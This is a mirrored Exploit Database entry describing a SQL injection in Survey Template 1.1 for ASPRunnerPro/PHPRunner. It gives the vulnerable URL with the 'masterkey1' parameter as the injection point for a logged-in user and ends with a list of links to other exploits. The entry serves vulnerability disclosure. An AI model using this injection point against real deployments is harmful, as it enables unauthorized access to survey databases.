Survey Template 1.1 – ‘masterkey1’ SQL Injection

Exploit Database
16 阅读

作者： Ihsan Sencan

日期： 2017-04-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/41837/

# # # # #
# Exploit Title: Survey Template v1.1 for ASPRunnerPro,PHPRunner. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=3
# Demo: https://xlinesoft.com/livedemo/survey/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/svv_questions_list.php?mastertable=svv_surveys&masterkey1=[SQL]
# # # # #

last Exploits
Survey Template 1.1 – ‘masterkey1’ SQL Injection的更多信息

Fibaro Home Center 2 – Remote Command Execution / Privilege Escalation：
Pirelli DRG A115 v3 ADSL Router – DNS Change：
Saurus CMS 4.7 – ‘edit.php’ Cross-Site Scripting：
Joomla! Component com_ksadvertiser – SQL Injection：
Omnistar Mailer 7.2 – Multiple Vulnerabilities：
Easy File Uploader – Arbitrary File Upload：
WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure：
Joomla! Component StreetGuessr Game 1.1.8 – SQL Injection：